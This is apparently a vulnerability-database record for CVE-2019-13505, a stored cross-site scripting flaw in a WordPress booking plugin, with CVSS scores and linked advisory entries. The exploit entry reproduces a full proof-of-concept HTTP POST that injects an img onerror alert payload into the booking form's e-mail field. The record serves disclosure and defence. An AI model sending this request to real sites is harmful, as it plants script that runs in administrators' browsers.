ID CVE-2019-13505
Type cve
Reporter cve@mitre.org
Modified 2019-07-16T09:15:00
Description
The Appointment Hour Booking plugin 1.1.44 for WordPress allows XSS via the E-mail field, as demonstrated by email_1.
{"id": "CVE-2019-13505", "bulletinFamily": "NVD", "title": "CVE-2019-13505", "description": "The Appointment Hour Booking plugin 1.1.44 for WordPress allows XSS via the E-mail field, as demonstrated by email_1.", "published": "2019-07-11T13:15:00", "modified": "2019-07-16T09:15:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13505", "reporter": "cve@mitre.org", "references": ["https://wpvulndb.com/vulnerabilities/9458", "https://wordpress.org/plugins/appointment-hour-booking/#developers", "https://github.com/ivoschyk-cs/CVE-s/blob/master/Appointment%20Hour%20Booking%20%E2%80%93%20WordPress%20Booking%20Plugin%20--%20stored%20XSS"], "cvelist": ["CVE-2019-13505"], "type": "cve", "lastseen": "2020-10-03T13:38:42", "edition": 5, "viewCount": 34, "enchantments": {"dependencies": {"references": [{"type": "wpvulndb", "idList": ["WPVDB-ID:9458"]}, {"type": "wpexploit", "idList": ["WPEX-ID:9458"]}], "modified": "2020-10-03T13:38:42", "rev": 2}, "score": {"value": 3.0, "vector": "NONE", "modified": "2020-10-03T13:38:42", "rev": 2}, "vulnersScore": 3.0}, "cpe": ["cpe:/a:dwbooster:appointment_hour_booking:1.1.44"], "affectedSoftware": [{"cpeName": "dwbooster:appointment_hour_booking", "name": "dwbooster appointment hour booking", "operator": "eq", "version": "1.1.44"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": ["cpe:2.3:a:dwbooster:appointment_hour_booking:1.1.44:*:*:*:*:wordpress:*:*"], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:dwbooster:appointment_hour_booking:1.1.44:*:*:*:*:wordpress:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"wpvulndb": [{"lastseen": "2020-12-09T20:38:25", "bulletinFamily": "software", "cvelist": ["CVE-2019-13505"], "description": "It is possible for an unauthenticated user to inject malicious JavaScript into a booking form, which will then be executed when an authenticated user views the booking in the WordPress admin interface.\n\n### PoC\n\nPOST /booking-form/ HTTP/1.1 Host: test.local User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://test.local/booking-form/ Content-Type: multipart/form-data; boundary=---------------------------11713224624340267851833710283 Content-Length: 1809 Connection: close Cookie: PHPSESSID=fa36a83a2ad7a7fe7b4864024c59bb43; rand_code_1=aa42293c7e2c5cd53a016331a32e4676 Upgrade-Insecure-Requests: 1 \\-----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=\"cp_pform_psequence\" _1 \\-----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=\"cp_appbooking_pform_process\" 1 \\-----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=\"cp_appbooking_id\" 2 \\-----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=\"cp_ref_page\" http://test.local/booking-form/ \\-----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=\"form_structure_1\" \\-----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=\"refpage_1\" http://test.local/booking-form/ \\-----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=\"fieldname1_1\" 2019-07-13 12:00/13:00 0 1 \\-----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=\"fieldname1_1_services\" 0 \\-----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=\"fieldname1_1_capacity\" 0 \\-----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=\"tcostfieldname1_1\" 1.00 \\-----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=\"email_1\" \"><\" \\-----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=\"fieldname2_1\" \"><\" \\-----------------------------11713224624340267851833710283 Content-Disposition: form-data; name=\"hdcaptcha_cp_appbooking_post\" auvoe \\-----------------------------11713224624340267851833710283-- \n", "modified": "2020-09-22T07:29:29", "published": "2019-07-09T00:00:00", "id": "WPVDB-ID:9458", "href": "https://wpvulndb.com/vulnerabilities/9458", "type": "wpvulndb", "title": "Appointment Hour Booking <= 1.1.45 - Stored Cross-Site Scripting (XSS)", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2020-12-09T20:38:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-13505"], "description": "It is possible for an unauthenticated user to inject malicious JavaScript into a booking form, which will then be executed when an authenticated user views the booking in the WordPress admin interface.\n", "modified": "2020-09-22T07:29:29", "published": "2019-07-09T00:00:00", "id": "WPEX-ID:9458", "href": "", "type": "wpexploit", "title": "Appointment Hour Booking <= 1.1.45 - Stored Cross-Site Scripting (XSS)", "sourceData": "POST /booking-form/ HTTP/1.1\r\nHost: test.local\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://test.local/booking-form/\r\nContent-Type: multipart/form-data; boundary=---------------------------11713224624340267851833710283\r\nContent-Length: 1809\r\nConnection: close\r\nCookie: PHPSESSID=fa36a83a2ad7a7fe7b4864024c59bb43; rand_code_1=aa42293c7e2c5cd53a016331a32e4676\r\nUpgrade-Insecure-Requests: 1\r\n\r\n-----------------------------11713224624340267851833710283\r\nContent-Disposition: form-data; name=\"cp_pform_psequence\"\r\n\r\n_1\r\n-----------------------------11713224624340267851833710283\r\nContent-Disposition: form-data; name=\"cp_appbooking_pform_process\"\r\n\r\n1\r\n-----------------------------11713224624340267851833710283\r\nContent-Disposition: form-data; name=\"cp_appbooking_id\"\r\n\r\n2\r\n-----------------------------11713224624340267851833710283\r\nContent-Disposition: form-data; name=\"cp_ref_page\"\r\n\r\nhttp://test.local/booking-form/\r\n-----------------------------11713224624340267851833710283\r\nContent-Disposition: form-data; name=\"form_structure_1\"\r\n\r\n\r\n-----------------------------11713224624340267851833710283\r\nContent-Disposition: form-data; name=\"refpage_1\"\r\n\r\nhttp://test.local/booking-form/\r\n-----------------------------11713224624340267851833710283\r\nContent-Disposition: form-data; name=\"fieldname1_1\"\r\n\r\n2019-07-13 12:00/13:00 0 1\r\n-----------------------------11713224624340267851833710283\r\nContent-Disposition: form-data; name=\"fieldname1_1_services\"\r\n\r\n0\r\n-----------------------------11713224624340267851833710283\r\nContent-Disposition: form-data; name=\"fieldname1_1_capacity\"\r\n\r\n0\r\n-----------------------------11713224624340267851833710283\r\nContent-Disposition: form-data; name=\"tcostfieldname1_1\"\r\n\r\n1.00\r\n-----------------------------11713224624340267851833710283\r\nContent-Disposition: form-data; name=\"email_1\"\r\n\r\n\"><img src=x onerror=alert(1)><\"\r\n-----------------------------11713224624340267851833710283\r\nContent-Disposition: form-data; name=\"fieldname2_1\"\r\n\r\n\"><img src=x onerror=alert(2)><\"\r\n-----------------------------11713224624340267851833710283\r\nContent-Disposition: form-data; name=\"hdcaptcha_cp_appbooking_post\"\r\n\r\nauvoe\r\n-----------------------------11713224624340267851833710283--\r\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}